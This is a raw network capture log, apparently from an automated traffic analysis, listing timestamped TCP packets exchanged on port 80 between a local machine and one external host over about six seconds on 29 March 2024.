Mar 29, 2024 14:25:26.396368027 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:26.396383047 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:26.549231052 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:26.549304962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:26.600805998 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:26.600847006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:26.600893974 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:26.600897074 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:26.600924969 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:26.600938082 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:26.601058006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:26.601104975 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:26.601159096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:26.601207018 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:26.766841888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:26.766911030 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:26.820300102 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:26.820353031 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:26.820377111 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:26.820404053 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:26.820410967 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:26.820451975 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:26.820461035 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:26.820499897 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:26.820523977 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:26.820574999 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:26.982938051 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:26.983038902 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.034730911 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.034813881 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.034830093 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.034857988 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.034975052 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.035018921 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.035038948 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.035079002 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.035198927 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.035233974 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.035244942 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.035274982 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.199786901 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.200084925 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.255047083 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.255156040 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.255186081 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.255208969 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.255243063 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.255295038 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.255588055 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.255661011 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.408175945 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.408333063 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.464833021 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.464879036 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.464953899 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.464994907 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.465084076 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.465126038 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.465141058 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.465173960 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.630414963 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.630517006 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.684683084 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.684703112 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.684899092 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.684905052 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.684942007 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.685039997 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.856704950 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.856728077 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.856895924 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.906833887 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.907018900 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:27.907092094 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.907110929 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:27.907190084 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.070833921 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.070864916 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.070878983 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.070894957 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.070899010 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.070931911 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.070931911 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.124594927 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.124617100 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.124634027 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.124684095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.124706030 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.289125919 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.289192915 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.289385080 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.289427996 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.289453030 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.289474010 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.289494038 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.289505959 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.338799953 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.338818073 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.338869095 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.338917017 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.338918924 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.338963985 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.500461102 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.500557899 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.500741959 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.500793934 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.500818014 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.500857115 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.554032087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.554059982 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.554073095 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.554086924 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.554111004 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.554143906 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.554303885 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.554347038 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.725418091 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.725497961 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.725534916 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.725543022 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.725562096 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.725584984 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.780385017 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.780473948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.780549049 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.780576944 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.780592918 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.780616999 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.780654907 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.780689955 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.780699968 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.780730963 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.948415041 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.948482990 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.948487997 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.948534966 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.948543072 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.948590994 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.997103930 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.997275114 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.997802973 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.997822046 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.997858047 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.997869968 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:28.998471975 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.998517990 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:28.998564005 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.160166025 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.160191059 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.160208941 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.160240889 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.160240889 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.160270929 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.210179090 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.210236073 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.210640907 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.210690975 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.210695028 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.210738897 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.211491108 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.211504936 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.211538076 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.211554050 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.378690958 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.378796101 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.379105091 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.379118919 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.379159927 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.379175901 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.428622961 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.428721905 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.428728104 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.428771019 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.429610014 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.429656982 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.429861069 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.429908037 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.595479965 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.595547915 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.595782042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.595815897 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.595822096 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.595849991 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.642287970 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.642352104 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.642906904 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.642981052 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.805802107 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.805886984 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.805892944 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.805933952 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.806119919 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.806168079 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.852297068 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.852392912 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:29.853120089 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:29.853163958 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.034161091 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.034173965 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.034240007 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.034265041 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.034423113 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.034480095 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.034523010 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.034552097 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.081815004 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.081845045 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.081938982 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.081971884 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.082346916 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.082389116 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.259923935 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.260018110 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.260186911 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.260200977 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.260266066 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.309386969 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.309412956 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.309426069 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.309443951 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.309459925 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.309555054 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.309607029 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.309636116 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.309676886 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.481900930 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.482007980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.482023001 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.482295036 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.528486967 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.528579950 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.528650999 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.528669119 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.528738022 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.528814077 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.528861046 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.528882027 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.528964043 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.710107088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.710124969 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.710197926 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.757661104 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.757704020 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.757771015 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.757822037 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.757869959 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.757957935 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.757961035 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.758006096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.758027077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.758131027 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.926770926 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.926788092 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.926827908 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.926865101 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.975044012 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.975060940 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:30.975123882 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:30.995368004 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.220429897 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.263928890 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.263950109 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.263962984 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.263978004 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.263992071 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.264004946 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.264013052 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.264019012 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.264040947 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.264054060 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.264069080 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.264085054 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.487273932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.487354994 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.487448931 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.487462997 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.487499952 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.487508059 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.487533092 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.487552881 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.487581015 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.487730026 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.487744093 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.487756968 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.487778902 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.487802982 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.717463017 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.717478991 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.717515945 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.717530012 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.717561960 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.717602968 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.718036890 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.718050957 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.718085051 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.718118906 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.918456078 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.918520927 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.939135075 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.939182043 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.939220905 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.939239025 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.939270020 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.939310074 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.939398050 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.939436913 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.939574957 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.939620018 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.939646006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.939687967 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:31.939821005 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:31.939862967 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.147243023 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.147355080 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.147357941 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.147397041 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.166348934 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.166419983 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.166515112 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.166558981 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.166579008 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.166621923 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.166800022 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.166843891 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.167236090 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.167278051 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.167292118 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.167345047 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.167354107 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.167387962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.365047932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.365124941 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.365207911 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.365253925 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.381711006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.381768942 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.382044077 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.382060051 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.382095098 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.382113934 CET	49699	80	192.168.2.7	89.238.170.230
